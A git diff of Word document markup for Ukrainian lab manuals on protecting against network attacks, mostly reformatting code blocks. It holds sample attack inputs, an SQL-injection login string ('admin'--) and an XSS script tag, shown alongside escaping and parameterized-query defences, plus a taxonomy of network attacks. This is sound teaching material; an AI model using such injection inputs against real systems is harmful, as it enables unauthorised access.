-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">[БЕЗПЕЧНИЙ] Параметри: ('admin'--', 'anything')</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Результат: None</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Ін'єкція заблокована!</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">============================================================</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">ДЕМОНСТРАЦІЯ XSS ТА ЗАХИСТУ</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">============================================================</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Зловмисний ввід: &lt;script&gt;alert("XSS")&lt;/script&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Без захисту (HTML): &lt;p&gt;Привіт, &lt;script&gt;alert("XSS")&lt;/script&gt;&lt;/p&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">НЕБЕЗПЕЧНО! Скрипт буде виконано в браузері.</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">З екрануванням: &lt;p&gt;Привіт, &amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&lt;/p&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Безпечно! Скрипт відображається як текст.</w:t>
       </w:r>
     </w:p>
@@ -4356,47 +4554,45 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Встановити Wireshark (якщо не встановлено)</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Запустити захоплення трафіку на основному інтерфейсі</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Відвідати кілька веб-сайтів (HTTP і HTTPS)</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Знайти та проаналізувати HTTP-запити</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Застосувати фільтри для виділення трафіку</w:t>
       </w:r>
     </w:p>
@@ -4420,47 +4616,45 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Переглянути поточні правила брандмауера</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Створити правило для блокування порту з варіанта</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Створити правило для дозволу порту з варіанта</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Перевірити роботу правил</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Видалити тестові правила</w:t>
       </w:r>
     </w:p>
@@ -4484,29 +4678,27 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Визначити відкриті порти на localhost</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Ідентифікувати процеси, що прослуховують порти</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Записати результати</w:t>
       </w:r>
     </w:p>
@@ -4530,38 +4722,36 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Запустити демонстраційний код SQL-ін'єкції</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Продемонструвати успішну атаку на вразливий код</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Продемонструвати блокування атаки безпечним кодом</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">- Повторити для XSS</w:t>
       </w:r>
     </w:p>
@@ -7615,15 +7805,8 @@
     <w:basedOn w:val="Normal"/>
     <w:qFormat/>
     <w:pPr>
-      <w:pBdr>
-        <w:top w:color="BFBFBF" w:space="4" w:sz="4" w:val="single"/>
-        <w:left w:color="BFBFBF" w:space="4" w:sz="4" w:val="single"/>
-        <w:bottom w:color="BFBFBF" w:space="4" w:sz="4" w:val="single"/>
-        <w:right w:color="BFBFBF" w:space="4" w:sz="4" w:val="single"/>
-      </w:pBdr>
-      <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
       <w:spacing w:after="120" w:before="120" w:line="200" w:lineRule="auto"/>
-      <w:ind w:firstLine="0" w:left="284" w:right="284"/>
+      <w:ind w:hanging="340" w:left="340" w:right="0"/>
       <w:jc w:val="left"/>
     </w:pPr>
     <w:rPr>

--- a/public/labs/pmzi/pz-23/ЛР9_ПМЗІ_Програмні_засоби_захисту_від_мережевих_атак.docx
+++ b/public/labs/pmzi/pz-23/ЛР9_ПМЗІ_Програмні_засоби_захисту_від_мережевих_атак.docx
@@ -92,246 +92,295 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">┌───────────────────────────────────────────────────────────────────────┐</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│                    КЛАСИФІКАЦІЯ МЕРЕЖЕВИХ АТАК                        │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">├───────────────────────────────────────────────────────────────────────┤</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│                                                                       │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  ЗА МЕТОЮ:                                                            │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  ├── Отримання доступу (Access attacks)                               │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  │   ├── Підбір паролів (Brute force)                                 │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  │   ├── Експлуатація вразливостей                                    │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  │   └── Man-in-the-Middle (MITM)                                     │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  │                                                                    │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  ├── Відмова в обслуговуванні (DoS/DDoS)                              │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  │   ├── SYN Flood                                                    │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  │   ├── UDP Flood                                                    │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  │   └── Amplification attacks                                        │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  │                                                                    │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  └── Розвідка (Reconnaissance)                                        │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│      ├── Сканування портів                                            │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│      ├── Сканування вразливостей                                      │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│      └── DNS enumeration                                              │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│                                                                       │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  ЗА РІВНЕМ OSI:                                                       │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  ├── L2: ARP spoofing, MAC flooding                                   │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  ├── L3: IP spoofing, ICMP attacks                                    │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  ├── L4: TCP/UDP attacks, port scanning                               │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  └── L7: SQL injection, XSS, CSRF                                     │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│                                                                       │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">└───────────────────────────────────────────────────────────────────────┘</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">┌───────────────────────────────────────────────────────────────────────┐</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                    КЛАСИФІКАЦІЯ МЕРЕЖЕВИХ АТАК                        │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">├───────────────────────────────────────────────────────────────────────┤</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ЗА МЕТОЮ:                                                            │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── Отримання доступу (Access attacks)                               │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   ├── Підбір паролів (Brute force)                                 │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   ├── Експлуатація вразливостей                                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   └── Man-in-the-Middle (MITM)                                     │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │                                                                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── Відмова в обслуговуванні (DoS/DDoS)                              │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   ├── SYN Flood                                                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   ├── UDP Flood                                                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   └── Amplification attacks                                        │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │                                                                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  └── Розвідка (Reconnaissance)                                        │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│      ├── Сканування портів                                            │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
